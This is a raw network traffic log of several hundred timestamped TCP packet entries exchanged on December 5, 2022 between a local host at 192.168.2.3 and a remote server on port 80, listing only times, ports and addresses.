Dec 5, 2022 01:32:37.739563942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739609003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739609957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739655018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739656925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739703894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739749908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739795923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739798069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739842892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739844084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739891052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739938021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.739984035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.739984989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740027905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740031958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740077972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740134954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740184069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740190983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740232944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740238905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740286112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740331888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740379095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740379095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740425110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740425110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740473032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740520000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740567923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740571976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740613937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740617990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740659952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740705967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740751982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740753889 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740797997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740797997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740843058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740890026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740936995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740940094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.740988016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.740989923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741034031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741079092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741110086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741127968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741173029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741219997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741226912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741281986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741283894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741331100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741379023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741426945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741429090 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741473913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741475105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741519928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741566896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741612911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741616011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741657972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741658926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741705894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741751909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741799116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741800070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741842985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.741843939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741889954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741938114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741983891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.741986036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742028952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742031097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742078066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742125988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742173910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742176056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742221117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742221117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742266893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742312908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742358923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742362976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742404938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742407084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742454052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742499113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742546082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742547989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742592096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742592096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742639065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742686033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742733002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742737055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742779970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742779970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742826939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742872000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742925882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.742934942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742983103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.742986917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743029118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743076086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743124008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743140936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743170977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743180990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743216991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743263006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743309975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743318081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743356943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743356943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743403912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743451118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743498087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743501902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743544102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743546009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743591070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743637085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743684053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743695974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743731976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743733883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743779898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743828058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743875027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743882895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743921041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.743921995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.743968010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744014025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744060040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744060993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744103909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744110107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744157076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744199991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744201899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744247913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744292974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744294882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744340897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744385958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744386911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744432926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744478941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744481087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744525909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744571924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744617939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744620085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744663954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744709969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744710922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744757891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744802952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744802952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744851112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744895935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.744908094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.744946003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763003111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763040066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763067961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763099909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763124943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763139963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763169050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763173103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763199091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763228893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763241053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763261080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763267040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763290882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763320923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763351917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763360023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763381958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763395071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763412952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763443947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763473988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763484955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763503075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763510942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763533115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763562918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763592005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763603926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763622999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763629913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763652086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763680935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763710976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763720036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763741016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763746023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763771057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763798952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763829947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.763839960 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763865948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.763988972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764019966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764050007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764067888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764081955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764111042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764141083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764151096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764172077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764178991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764202118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764230967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764261007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764273882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764290094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764297962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764321089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764349937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764381886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764393091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764411926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764420033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764441013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764471054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764501095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764511108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764530897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764539003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764560938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764590025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764621019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764628887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764650106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764657974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764678955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764708042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.764746904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.764986038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765016079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765045881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765050888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765077114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765106916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765119076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765137911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765145063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765167952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765197992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765227079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765238047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765258074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765264034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765288115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765317917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765347004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765358925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765377045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765383959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765405893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765435934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765466928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765479088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765496969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765503883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765527010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765556097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765583992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765597105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765614986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765621901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765645981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765675068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765705109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765713930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765743971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.765923977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765954971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.765985012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766015053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766036987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766045094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766056061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766074896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766105890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766134977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766145945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766165018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766171932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766195059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766225100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766253948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766263008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766284943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766290903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766314983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766345024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766374111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766382933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766402960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766411066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766433001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766463041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766490936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766499996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766521931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766530037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766552925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766581059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766609907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766623020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766638994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766653061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.766889095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766967058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.766999006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767019033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767029047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767040014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767059088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767088890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767117977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767127037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767148972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767154932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.767178059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.767208099 CET	80	49705	66.235.200.147	192.168.2.3
